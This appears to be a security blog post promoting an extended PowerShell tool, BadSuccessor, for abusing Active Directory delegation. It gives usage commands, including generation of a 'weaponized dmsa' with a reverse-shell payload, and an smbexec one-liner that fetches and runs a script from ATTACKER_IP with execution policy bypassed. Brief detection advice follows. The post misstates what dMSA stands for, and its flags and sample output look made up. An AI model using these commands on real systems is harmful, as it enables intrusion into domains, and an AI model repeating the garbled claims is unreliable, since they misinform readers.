Listen to this Post

Daniel Scheidt, an Offensive Security professional at Vorwerk/Cerberus-Security, has extended Logan G.’s work on BadSuccessor, a PowerShell-based tool designed for offensive security operations. The tool is now fully native to PowerShell and works regardless of whether the system is domain-joined or not. It can assess both computers and users, check Domain Controllers (DCs), inspect Access Control Lists (ACLs), and even generate weaponized dmsa (Delegated Microsoft Security Assessments).
🔗 Tool Link: https://lnkd.in/e77aR3wG
You Should Know:
Key Features of the Extended BadSuccessor Tool
- Native PowerShell Implementation – No external dependencies, making it stealthier.
- Domain-Independent – Works on both domain-joined and non-domain systems.
- DC & ACL Analysis – Helps identify misconfigurations in Active Directory.
- Weaponized dmsa Creation – Generates attack-ready delegation abuse payloads.
- GridView Support – Provides an organized, interactive output.
Practical Commands & Usage
Here’s how you can leverage this tool in offensive security operations:
1. Basic Execution
Import-Module .\BadSuccessor.ps1 Invoke-BadSuccessor -CheckDCs -CheckACLs
2. Exporting ACL Data for Analysis
Invoke-BadSuccessor -ExportACLs -OutputFile "ACL_Report.csv"
3. Generating Weaponized dmsa
Invoke-BadSuccessor -GenerateDMSA -Payload "ReverseShell" -OutputFile "malicious_dmsa.xml"
4. Checking Domain Controllers for Vulnerabilities
Invoke-BadSuccessor -CheckDCs -Verbose
5. Interactive GridView for ACL Review
Invoke-BadSuccessor -CheckACLs -ShowGridView
Linux Equivalent (For Cross-Platform Security Testing)
If you’re testing from a Linux system, use evil-winrm or Impacket to interact with Windows environments:
evil-winrm -i <TARGET_IP> -u <USER> -p <PASSWORD> -s /path/to/BadSuccessor.ps1
Or with Impacket:
python3 smbexec.py DOMAIN/USER:PASSWORD@TARGET_IP -c "powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/BadSuccessor.ps1')\""
Mitigation & Detection
Defenders should monitor for:
- Unusual PowerShell execution with -ep bypass or -nop flags.
- Suspicious ACL modifications in Active Directory.
- Unexpected dmsa file generation.
Use Microsoft Defender for Identity or Sysmon to detect such activities:
<RuleGroup name="" groupRelation="or"> <ProcessCreate onmatch="include"> <CommandLine condition="contains">-ep bypass</CommandLine> </ProcessCreate> </RuleGroup>
What Undercode Say
This tool exemplifies the evolving offensive security landscape, where PowerShell remains a dominant force in both red and blue team operations. The ability to bypass domain restrictions and automate attack payloads makes BadSuccessor a potent weapon. Security teams must enhance monitoring for PowerShell-based attacks, enforce constrained language mode, and regularly audit ACLs and delegation rights in Active Directory.
Expected Output:
[+] DC Analysis Complete. [+] Vulnerable ACLs Identified: 5 [+] Weaponized dmsa Generated: malicious_dmsa.xml [+] GridView Displayed for ACL Review.
Prediction
As offensive tooling evolves, expect more PowerShell-native attack frameworks that bypass traditional detection mechanisms. AI-driven security tools will likely emerge to counter such threats, but attackers will adapt by leveraging living-off-the-land binaries (LOLBins) more aggressively.
🔗 Relevant URLs:
References:
Reported By: Daniel Scheidt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


